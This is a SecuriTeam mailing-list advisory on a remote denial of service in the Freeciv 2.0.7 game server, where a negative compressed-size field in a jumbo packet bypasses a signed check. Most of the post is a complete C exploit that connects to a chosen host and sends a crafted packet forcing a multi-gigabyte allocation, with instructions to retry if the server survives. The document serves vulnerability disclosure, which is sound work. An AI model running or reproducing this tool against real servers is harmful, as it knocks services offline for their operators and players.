[NEWS] Freeciv Resource Starvation

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Freeciv Resource Starvation
------------------------------------------------------------------------


SUMMARY

<http://www.freeciv.org> Freeciv is "an open source clone of the well
known Civilization game. The game supports also online gaming through its
own metaserver (which can be seen also on the web) and GGZ". A remotely
exploitable vulnerability in Freeciv allows remote attackers to cause the
Freeciv to starve the computer from its memory resource.

DETAILS

Vulnerable Systems:
* Freeciv version 2.0.7

Immune Systems:
* Freeciv version 2.0.8

Freeciv supports both plain and compressed data (administrators can
disable this feature only recompiling the server from the source code with
USE_COMPRESSION undefined). When the server receives a jumbo data (size
set to 0xffff) it reads the subsequent 32 bits number which identifies the
size of the compressed data.

Then it makes a signed comparison to know if the compressed size is major
than the data received, if the client uses a negative compressed size
value it will be able to elude this check. After having subtracted 6 bytes
(header size) from this number the server tries to allocate the memory
needed for decompressing the data which is fixed to 100 times this size.
If the memory cannot be allocated the server terminates or freezes showing
an out of memory message.

Exploit:
/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

#ifdef WIN32
#include <winsock.h>
#include "winerr.h"

#define close closesocket
#define ONESEC 1000
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>

#define ONESEC 1
#endif



#define VER "0.1"
#define PORT 5555
#define JUMBO_SIZE 0xffff



u_int resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
struct sockaddr_in peer;
u_int boomsz;
int sd,
i;
u_short port = PORT;
u_char buff[6];

#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

srand(time(NULL));
setbuf(stdout, NULL);

fputs("\n"
"Freeciv <= 2.0.7 jumbo malloc crash "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@xxxxxxxxxxxxx\n"
"web: http://aluigi.altervista.org\n";
"\n", stdout);

if(argc < 2) {
printf("\n"
"Usage: %s <host> [port(%hu)]\n"
"\n", argv[0], port);
exit(1);
}

if(argc > 2) port = atoi(argv[2]);
peer.sin_addr.s_addr = resolv(argv[1]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;

printf("- target %s : %hu\n",
inet_ntoa(peer.sin_addr), port);

sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();

printf("- connect...");
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
printf(" done\n");

boomsz = 6 + (rand() * 1234);
for(;;) {
if(!boomsz) boomsz++;
if(boomsz > 0) boomsz = -boomsz;
if((u_int)((boomsz - 6) * 100) > 0x7fffffff) break;
boomsz *= 1234; // more than 2 gigabytes, I want to be sure
}

*(u_short *)buff = JUMBO_SIZE;
*(u_int *)(buff + 2) = htonl(boomsz);

// int compressed_size = whole_packet_len - header_size; //
header_size = 6
// long int decompressed_size = 100 * compressed_size;

printf("- send BOOM data (try to allocate %u bytes on the remote
system)\n",
(u_int)(ntohl(*(u_int *)(buff + 2)) - 6) * 100);
if(send(sd, buff, 6, 0)
< 0) std_err();

printf("- wait some seconds:\n");
for(i = 3; i >= 0; i--) {
printf("%3d\r", i);
sleep(ONESEC);
}

close(sd);
printf(
"- the server should be crashed or freezed, check it manually\n"
" if it's still online retry again with this tool or the server
is patched\n"
"\n");
return(0);
}



u_int resolv(char *host) {
struct hostent *hp;
u_int host_ip;

host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolv hostname (%s)\n", host);
exit(1);
} else host_ip = *(u_int *)hp->h_addr;
}
return(host_ip);
}



#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif


ADDITIONAL INFORMATION

The information has been provided by <mailto:aluigi@xxxxxxxxxxxxx> Luigi
Auriemma.
The original article can be found at:
<http://aluigi.altervista.org/adv/freecivdos-adv.txt>
http://aluigi.altervista.org/adv/freecivdos-adv.txt



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages